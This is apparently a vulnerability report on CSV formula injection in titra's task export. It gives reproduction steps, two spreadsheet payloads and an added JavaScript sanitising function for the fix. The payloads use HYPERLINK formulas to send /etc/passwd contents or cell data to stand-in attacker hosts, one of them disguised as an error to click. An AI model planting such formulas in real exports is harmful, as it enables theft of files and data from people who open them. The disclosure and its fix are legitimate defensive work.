Formula Injection/CSV Injection due to Improper Neutralization of Formula Elements in CSV File in kromitgmbh/titra
Jun 3rd 2022
Formula Injection/CSV Injection in "Task" due to Improper Neutralization of Formula Elements in CSV File.
Proof of Concept
- Click on the plus track button
- Under the task input field, enter the payloads
- Now enter the work hour as
- Then click on save
- Now go to details and click on CSV, and the CSV file will be downloaded.
Successful exploitation can lead to impacts such as client-side command injection, code execution, or remote exfiltration of contained confidential data. With payloads constructed as
=HYPERLINK(CONCATENATE("http://attackerserver:port/a.txt?v="; ('file:///etc/passwd'#$passwd.A1)); =HYPERLINK("http://evil.com?x="&A3&","&B3&"[CR]","Error fetching info: Click me to resolve.")
an attacker can gain access to the /etc/passwd system file.
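
The missing neutralization step on the export side, shown as an added example that is not part of the original report and is not titra's own code. The function names and sample rows are hypothetical; the approach (prefix a leading formula character with an apostrophe, quote every field, double embedded quotes) follows OWASP's CSV injection guidance.

```javascript
// Added example: neutralise formula elements before task names reach the CSV export.
// neutraliseCell/toCsv and SAMPLE_ROWS are hypothetical names, not titra code.

// Leading characters that make a spreadsheet evaluate a cell as a formula.
const FORMULA_TRIGGERS = new Set(['=', '+', '-', '@', '\t', '\r']);

function neutraliseCell(value) {
  let text = value === null || value === undefined ? '' : String(value);
  // Real numbers (e.g. negative hour corrections) stay numeric; only
  // user-supplied strings are inspected for a formula trigger.
  const isPlainNumber = typeof value === 'number' && Number.isFinite(value);
  if (!isPlainNumber && text.length > 0 && FORMULA_TRIGGERS.has(text[0])) {
    text = "'" + text; // leading apostrophe forces text interpretation
  }
  // Always quote the field and double embedded quotes, so a separator or
  // quote inside the task name cannot break out and start a new cell.
  return '"' + text.replace(/"/g, '""') + '"';
}

function toCsv(rows) {
  return rows.map((row) => row.map(neutraliseCell).join(',')).join('\r\n');
}

// Constructed sample data: a header, a normal entry, and two entries whose
// task field begins with a formula trigger.
const SAMPLE_ROWS = [
  ['Task', 'Hours'],
  ['Write release notes', 2],
  ['=1+1', 1.5],
  ['@SUM(A1:A2) "urgent"', -0.5],
];

console.log(toCsv(SAMPLE_ROWS));
```

Apply the same function to every user-controlled column in the export, not only the task name.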